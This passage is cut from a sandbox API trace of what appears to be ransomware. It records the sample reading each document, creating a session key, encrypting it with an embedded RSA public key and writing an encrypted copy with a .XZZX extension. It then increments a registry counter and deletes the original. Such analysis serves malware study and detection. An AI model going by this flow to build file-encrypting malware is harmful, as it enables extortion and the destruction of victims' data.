Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0039.260] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2da88) returned 1 [0039.262] CryptGenKey (in: hProv=0x3e2da88, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5090) returned 1 [0039.367] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0039.367] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0039.367] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.368] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.368] CryptDestroyKey (hKey=0x42e5090) returned 1 [0039.368] CryptReleaseContext (hProv=0x3e2da88, dwFlags=0x0) returned 1 [0039.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8441A0B23FA9B9126D832A0D43D69D5A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\8441a0b23fa9b9126d832a0d43d69d5a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0039.368] WriteFile (in: hFile=0x460, lpBuffer=0x3e45838*, nNumberOfBytesToWrite=0x5cc4, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesWritten=0x42ce438*=0x5cc4, lpOverlapped=0x0) returned 1 [0039.369] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5cc4 [0039.369] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.369] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5cc9 [0039.369] WriteFile (in: hFile=0x460, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1c, lpOverlapped=0x0) returned 1 [0039.369] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5ce5 [0039.369] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.369] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5cea [0039.369] SetErrorMode (uMode=0x1) returned 0x1 [0039.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0039.370] OutputDebugStringW (lpOutputString="end") [0039.370] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.370] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0039.370] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2da88) returned 1 [0039.371] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2da88, dwCertEncodingType=0x1, pInfo=0x3dd28e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2918*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2920*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e5150) returned 1 [0039.371] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.371] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0039.371] CryptEncrypt (in: hKey=0x42e5150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0039.371] CryptEncrypt (in: hKey=0x42e5150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2db10*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2db10*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0039.371] WriteFile (in: hFile=0x460, lpBuffer=0x3e2db10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2db10*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0039.372] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0039.372] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.372] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0039.372] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0039.372] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x494) returned 0x0 [0039.372] RegQueryValueExW (in: hKey=0x494, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x20, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0039.372] RegCloseKey (hKey=0x494) returned 0x0 [0039.372] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x494) returned 0x0 [0039.372] RegSetValueExW (in: hKey=0x494, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x21, cbData=0x4 | out: lpData=0x42cdfec*=0x21) returned 0x0 [0039.372] RegCloseKey (hKey=0x494) returned 0x0 [0039.372] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.373] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.373] CloseHandle (hObject=0x460) returned 1 [0039.375] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0039.376] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0039.376] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\Gg8kaToejw.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\gg8katoejw.xls")) returned 1 [0039.378] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\Gg8kaToejw.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\gg8katoejw.xls")) returned 0 Thread: id = 127 os_tid = 0x540 [0039.528] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.528] lstrcpyW (in: lpString1=0x417f460, lpString2="JDjp8wKsx5Dz.ots" | out: lpString1="JDjp8wKsx5Dz.ots") returned="JDjp8wKsx5Dz.ots" [0039.528] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.528] SetErrorMode (uMode=0x1) returned 0x1 [0039.528] lstrcpyW (in: lpString1=0x417f860, lpString2="JDjp8wKsx5Dz.ots" | out: lpString1="JDjp8wKsx5Dz.ots") returned="JDjp8wKsx5Dz.ots" [0039.528] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x47de5ede, Data2=0xee3e, Data3=0x4e3b, Data4=([0]=0xa9, [1]=0xa6, [2]=0xbc, [3]=0x17, [4]=0x16, [5]=0x6, [6]=0x2, [7]=0x6b))) returned 0x0 [0039.528] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\JDjp8wKsx5Dz.ots") returned 81 [0039.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0039.529] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned 102 [0039.529] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="XZZX") returned 0x0 [0039.529] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\JDjp8wKsx5Dz.ots", dwFileAttributes=0x20) returned 1 [0039.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\JDjp8wKsx5Dz.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\jdjp8wksx5dz.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0039.529] ReadFile (in: hFile=0x48c, lpBuffer=0x3e45838, nNumberOfBytesToRead=0x7afd, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesRead=0x417e418*=0x7afd, lpOverlapped=0x0) returned 1 [0039.530] CloseHandle (hObject=0x48c) returned 1 [0039.530] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0039.530] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0039.531] SetErrorMode (uMode=0x1) returned 0x1 [0039.531] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0039.531] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2db98) returned 1 [0039.534] CryptGenKey (in: hProv=0x3e2db98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5090) returned 1 [0039.662] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.662] CryptExportKey (in: hKey=0x42e5090, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0039.662] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.663] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.663] CryptDestroyKey (hKey=0x42e5090) returned 1 [0039.663] CryptReleaseContext (hProv=0x3e2db98, dwFlags=0x0) returned 1 [0039.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\240d5dc448cdcc4a47de5ede4ce5b092.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0039.663] WriteFile (in: hFile=0x48c, lpBuffer=0x3e45838*, nNumberOfBytesToWrite=0x7afd, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesWritten=0x417e438*=0x7afd, lpOverlapped=0x0) returned 1 [0039.664] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7afd [0039.664] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.664] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b02 [0039.664] WriteFile (in: hFile=0x48c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x20, lpOverlapped=0x0) returned 1 [0039.664] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b22 [0039.665] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.665] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b27 [0039.665] SetErrorMode (uMode=0x1) returned 0x1 [0039.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0039.665] OutputDebugStringW (lpOutputString="end") [0039.665] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.665] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0039.665] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2db98) returned 1 [0039.666] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2db98, dwCertEncodingType=0x1, pInfo=0x3dd2b58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2b88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2b90*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5190) returned 1 [0039.666] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.666] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0039.666] CryptEncrypt (in: hKey=0x42e5190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0039.666] CryptEncrypt (in: hKey=0x42e5190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2dc20*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2dc20*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0039.667] WriteFile (in: hFile=0x48c, lpBuffer=0x3e2dc20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2dc20*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0039.667] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0039.667] WriteFile (in: hFile=0x48c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0039.667] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0039.667] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0039.667] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x478) returned 0x0 [0039.667] RegQueryValueExW (in: hKey=0x478, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x21, lpcbData=0x417dfdc*=0x4) returned 0x0 [0039.667] RegCloseKey (hKey=0x478) returned 0x0 [0039.667] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x478) returned 0x0 [0039.667] RegSetValueExW (in: hKey=0x478, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x22, cbData=0x4 | out: lpData=0x417dfec*=0x22) returned 0x0 [0039.667] RegCloseKey (hKey=0x478) returned 0x0 [0039.667] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.668] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.668] CloseHandle (hObject=0x48c) returned 1 [0039.669] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0039.670] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0039.670] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\JDjp8wKsx5Dz.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\jdjp8wksx5dz.ots")) returned 1 [0039.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\JDjp8wKsx5Dz.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\jdjp8wksx5dz.ots")) returned 0 Thread: id = 128 os_tid = 0x910 [0039.684] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.684] lstrcpyW (in: lpString1=0x417f460, lpString2="KtwKDD9P56tzPTxgwQR.ods" | out: lpString1="KtwKDD9P56tzPTxgwQR.ods") returned="KtwKDD9P56tzPTxgwQR.ods" [0039.684] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.684] SetErrorMode (uMode=0x1) returned 0x1 [0039.684] lstrcpyW (in: lpString1=0x417f860, lpString2="KtwKDD9P56tzPTxgwQR.ods" | out: lpString1="KtwKDD9P56tzPTxgwQR.ods") returned="KtwKDD9P56tzPTxgwQR.ods" [0039.684] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x8be33b7c, Data2=0x3ecf, Data3=0x4529, Data4=([0]=0xb3, [1]=0xad, [2]=0x44, [3]=0x1f, [4]=0x3e, [5]=0xd, [6]=0x6a, [7]=0x3c))) returned 0x0 [0039.685] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\KtwKDD9P56tzPTxgwQR.ods") returned 88 [0039.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0039.685] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\2525214410F7DA278BE33B7C150FBE6F.XZZX") returned 102 [0039.685] StrStrW (lpFirst="KtwKDD9P56tzPTxgwQR.ods", lpSrch="XZZX") returned 0x0 [0039.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\KtwKDD9P56tzPTxgwQR.ods", dwFileAttributes=0x20) returned 1 [0039.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 